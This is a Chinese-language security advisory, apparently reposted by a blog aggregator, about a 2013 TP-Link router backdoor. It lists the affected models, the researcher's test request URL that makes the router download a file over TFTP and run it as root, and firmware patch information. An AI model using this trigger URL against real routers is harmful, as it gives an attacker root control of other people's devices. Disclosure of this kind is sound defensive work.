tftp刷路由器 linux,TP-Link无线路由器HTTP/TFTP后门漏洞
發布日期:2013-03-13
更新日期:2013-03-21
受影響系統:
TP-LINK TL-WDR4300 v1
TP-LINK TL-WR743ND v2.0
TP-LINK TL-WR743ND v1.2
TP-LINK TL-WR941N
TP-LINK TL-WR2041
TP-LINK TL-WDR4310
TP-LINK TL-WDR4320
TP-LINK TL-WR743N
描述:
--------------------------------------------------------------------------------
TP-Link是知名的網絡與通信設備供應商。
TP-LINK的某些型號的路由器存在一個后門功能,通過訪問某個無需授權認證的特定頁面,路由器會自動從攻擊者控制的TFTP服務器上下載程序并執行。攻擊者利用這個漏洞可以在路由器上以root身份執行任意命令,從而可完全控制路由器。
攻擊者利用此漏洞需要能訪問到路由器的WEB管理界面,但無需知道管理口令。
默認情況下,WEB管理界面不允許通過WAN口訪問,但允許通過本地網絡訪問。
鏈接:http://sekurak.pl/tp-link-httptftp-backdoor/
*>
測試方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
Michal Sajdak (michal.sajdak[at]securitum.pl)提供了如下測試方法:
向設備發送請求“ http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html ”(這里假設路由器IP為192.168.0.1),路由器會從發起請求的機器通過tftp下載一個nart.out文件,并以root權限執行該文件。
建議:
--------------------------------------------------------------------------------
廠商補丁:
TP-LINK
-------
廠商已經陸續發布了相關固件的升級版本,請到廠商升級網站進行更新:
http://service.tp-link.com.cn/list_download_software_1_0.html
截至2013.03.21日,已發布下列固件升級:
TL-WDR4310V1_TL-WDR4320 V1_130319標準版
TL-WR743N_V2_130318標準版
TL-WR2041_V1_130318標準版
?TL-WR941N_V6_130318標準版
總結
以上是生活随笔為你收集整理的tftp刷路由器 linux,TP-Link无线路由器HTTP/TFTP后门漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux redhate7 yum源,
- 下一篇: linux5支持32,Red Hat发布